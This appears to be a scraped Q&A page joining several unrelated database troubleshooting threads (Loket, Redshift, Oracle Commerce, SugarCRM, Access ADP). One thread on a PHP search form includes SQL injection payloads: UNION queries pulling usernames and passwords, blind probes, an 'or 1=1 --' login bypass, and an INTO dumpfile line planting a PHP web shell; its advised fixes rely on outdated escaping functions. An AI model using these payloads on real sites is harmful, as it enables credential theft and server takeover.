For one customer site, the following query:
select /*+ ods(false) */ *
from Werkgevers#loket wgr
join PersonenPerWerkgever(wgr.entryid)#loket psn
join WerknemerVerloningsrunsPerPersoon(wgr.entryid)#loket wvn
returns an error with message code "s:Client" and text "Not Allowed List".
I seem unable to find any documentation on this loket.nl error with Invantive SQL. How can I fix it?
This error is typically caused by missing privileges. The text is not very well formulated, but you will have to live with it since Loket is focusing on adding a new REST-based API platform.
Make sure your user has sufficient privileges.
Related
I have a scheduled query in Redshift that simply will not run. It works when I execute the query manually in the query editor, just not when scheduled. I can't seem to find any feedback about why it's failing, though. I can see the schedule history, a unique Id, and the status of "Failed", but no more info.
Is there a system table/view that I can dig into and find out what's going on with my query? The SQL consists of basic select, update, insert style code - nothing fancy, just long.
You can look for any errors using:
select
process,
errcode,
linenum as line,
trim(error) as err
from
stl_error;
Also: Retrieve Redshift error messages
Ref.: STL_ERROR
It says in the description that it doesn't record SQL errors which would likely be the problem of the failed query.
I'm trying to sort this one as well and it seems it's limited as I only see the
Any idea how to get the associated query ID, PID, or EID so I can check maybe against the query history?
I am trying to perform order and profile search operations on CSC, but they return no results.
I the components /atg/commerce/textsearch/OrderOutputConfig/ and /atg/userprofiling/textsearch/ProfileOutputConfig/ and I found them indexing perfectly in the tables SRCH_ORDER_TOKENS and SRCH_PROFILE_TOKENS respectively.
After enabling loggingDebug in both components I found that the search query has additional condition seems that it's related to multisite pfrmZeroRealmsAccessible, however I found that all tokens stored in DB for orders and customers have this value pfrmdft. Below is the query extracted from logs:
[++SQLQuery++]
SELECT t1.id
FROM srch_order_tokens t1
WHERE CONTAINS(t1.tokens,?,0) > 0
-- Parameters --
p[1] = {pd: tokens} pflnAhmad% AND pfrmZeroRealmsAccessible% (java.lang.String)
[--SQLQuery--]
Note: My application has only one single site (not multisite) however I found some configuration files created by CIM related to multisite which I can't remove.
Please help me answering the following question:
Is this issue really related to multisite configuration and how can I fix this problem in orders and customers search?
In Oracle commerce 11.1 how can I disable working with multisite?
Thanks
If you have not configured multi site then you need change the property "siteAccessControlOn" to false in the below component
/atg/commerce/custsvc/environment/CSREnvironmentTools/
for more details you can get back to the below oracle docs link
http://docs.oracle.com/cd/E52191_01/Service.11-1/ATGCommerceServiceCenterInstall/html/s1203controllingsiteaccess01.html
I am running SugarCRM 6.5.x and using the SOAP API. What I am trying to achieve is lookup an Account by checking the value of a custom field with the company registration number like this:
get_entry_list(...
accounts.id in (select id_c from accounts_cstm join accounts on accounts_cstm.id_c = accounts.id where accounts_cstm.company_number__c = '12345678')
... )
I keep getting access denied errors and I don't understand why? If I run the query in phpmyadmin it works fine? How can I make this work for SugarCRM?
Support for subqueries like that in our Web Services API is removed as of Sugar 6.4, with certain exceptions; see this post for more details...
http://developer.sugarcrm.com/2012/03/19/howto-avoiding-subqueries-with-our-web-services/
For this one, you shouldn't need to do the subquery as the cstm is joined in automatically.
Are you sure that you opened a session and send the right parameters?
get_entry_list($session, $module_name, $query, $order_by,$offset, $select_fields, $link_name_to_fields_array, $max_results, $deleted )
Take a look at the API Description and search for "Call: get_entry_list()".
It's for 6.4 but shouldn't make any difference.
I am building a very small website (with PHP) and I have 2 big issues
The first one is about my search form
I have build a really simple search form in order to retrieve my content, then I used an online security tool and show me that my search form was vulnerable to SQLi
I had no idea abut that so I started testing some attacks I found on some sites
As far as now only 'OR 'x'='x worked (it returns the entire content of my website, is this bad? How can an attacker hurt me?
The second issue is about my photos, I am using a folder called mywebsite.com/uploads/ to access my photos
Although /upload is protected the subfolders uploads/temp and uploads/thumbs are visible through the browser
May this be hurtful too?
Any advice?
SQL injection is really bad but i like it :)
there is many types of sql injection like
remote sql injecton
blind sql injection
auto bypass sql injection
**Remote sql injection**
its the easy way to get data from site hacker use it like coders
see this example
mysql_query("SELECT * FROM `table_name` WHERE id=".$_GET['id']." ) ;
There is no security in my code
site.php?id=1
my query will execute like
mysql_query("SELECT * FROM `table_name` WHERE id=1 ) ;
if hacker he will kill your code
site.php?id=1(any thing here can make problem ex: ` ' a-z A-Z / * / " )
Because query will be like this
mysql_query("SELECT * FROM `table_name` WHERE id=1' ) ;
so single quotaion will make error in your query
and hacker can attack like this
site.php?id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users
here your query will execute like
mysql_query("SELECT * FROM `table_name` WHERE id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users) ");
and this will work :)
blind sql injection
hacker cannot work with easy way remote sql injection
because it here depend on right and false
so he will use and or
like this
and (select user_name from users) ;
if work fine the script will work good else error will happen
he can know database info like this
example admin table is admin
and (select user_name from users) ; x error
and (select user_name from admin) ; fine
auto bypass
its blicd sql injection but only true condition can access to admin
mysql_query("SELECT * FROM `users` WHERE `user_name`= ".$_POST['user']." AND `password` ='".md5($_POST['pass'])."' ");
hacker can login like this
user = anything' or 1=1 --
so your query will be like
mysql_query("SELECT * FROM `users` WHERE `user_name`= anything or 1=1 --");
anything is error user in databse
but condition or 1=1 is true
-- will ignore your password check
he can access easily
protect
addslashes _ mysql_real_escape_string _ intval ( with number only )
folder premission you can use
empty index.html , index.php ,
If you allow SQL injection, an attacker can do all sorts of bad things to your website. They can inject code to DROP DATABASE, deleting your entire database!
If you are logging into your mysql as the root user, they can potentially write to files (and create) files on your server.
The injection;
SELECT '<?php system($_GET[''cmd'']); ?>' INTO dumpfile('./command.php');
Would be a common first step to breaking into your server, allowing the attacker to execute arbitrary commands under the www-data user. From here it is trivial to recruit your server into a botnet, use it to send spam (getting you blacklisted from sending emails), or simply delete all your files just to ruin your day.
What you must do, is to sanitise all user input. So, in your search processor, you must escape any special characters from the search query before passing it onto the database, you can do this using mysql_real_escape_string();
so;
$search_query = mysql_real_escape_string($_POST['search']);
It is then safe to use $search_query in your mysql query.
SQL injections - it's bad.
someone can run any query he wants in your database, find passwords, delete your entire data etc.
you can avoid it by wrapping all user input in your queries with mysql_real_escape_string
about the directories - it really depends on the accesses you provide. if file listing is available, it doesn't really mean that someone can make changes/execute them
Ad SQL Injection:
Displaying the entire content can be a problem if you have unpublished articles or articles only available for registered users etc.
Try reading more on SQL Injections. It may be possible to execute a second query that inserts new data in your database - or worse changes data (for example passwords). There's a lot of reading material out there, a start could be: http://php.net/manual/en/security.database.sql-injection.php Sanitise all your input and remember: even if you may not find a way to do harm via a security hole it doesn't mean no one will find a way ;)
Ad the folders: you mean that any user can see the content of the folders? If so, users may see pictures they shouldn't see. If you had a good reason for protecting (no file listing?) the main directory, why not apply it to the temps/ and thumbs/ subdirectories?
I have a (very simple and standard) UPDATE statement which works fine either directly in Query Analyser, or executed as a stored procedure in Query Analyser.
UPDATE A
SET
A.field1 = B.col1
, A.field2 = B.col2
FROM
tblA AS A INNER JOIN tblB AS B
ON A.pk1 = B.pk1 AND A.pk2 = B.pk2
Problem is when i execute the same stored proc via microsoft ADP (by double-clicking on the sproc name or using the Run option), it says "query ran successfully but did not return records" AND does NOT update the records when i inspect the tables directly.
Before anyone even says "syntax of MS-Access is different than SQLServer T-SQL", remember that with ADP everything happens on the server and one is actually passing thru to T-SQL.
Any bright ideas from any ADP gurus out there?
Gotcha. Responding to my own question for the benefit of anyone else.
Tools / Options / Advanced / Client-Server Settings / Default max records is set at 10,000 (presumably this is the default). Change this to 0 for unlimited.
My table had 100,000+ rows and whatever set of 10,000 it was updating was difficult to find ( among a sea of 90,000+ un-updated rows ). Hence the update did not work fully as expected.
Try and see whether the query gets executed on the SQL Server using SQL profiler.
Also, I think you might need to close the linked table & re-open it to see the updated records.
Does that work?
Run the query with SQL PRofiler running. Before you start the trace add in all the error events. This will give you any errors that the SQL Server is generating that the Access ADP might not be showing correctly (or at all).
Feel free to post them here.
Just as a reference, here's a paper I wrote on Update Queries that discusses some of the issues associated with when the fail.
http://www.fmsinc.com/microsoftaccess/query/snytax/update-query.html
I seem to remember that I always got the "didn't return any rows" message and had to simply turn off the messaging. It's because it isn't returning any rows!
as for the other - sometimes there's a primary key issue. Does the table being updated have a primary key in SQLServer? If so, check the view of the table in Access - sometimes that link doesn't come through. It's been a while, so I could be wrong, but I think you may need to look at the design view of the table while in access and add the primary key there.
EDIT: Additional thought:
in your debugging, try throwing in print statements to see what the values of your inputs are. Is it actually picking up the data from the table as you expect when you execute from access?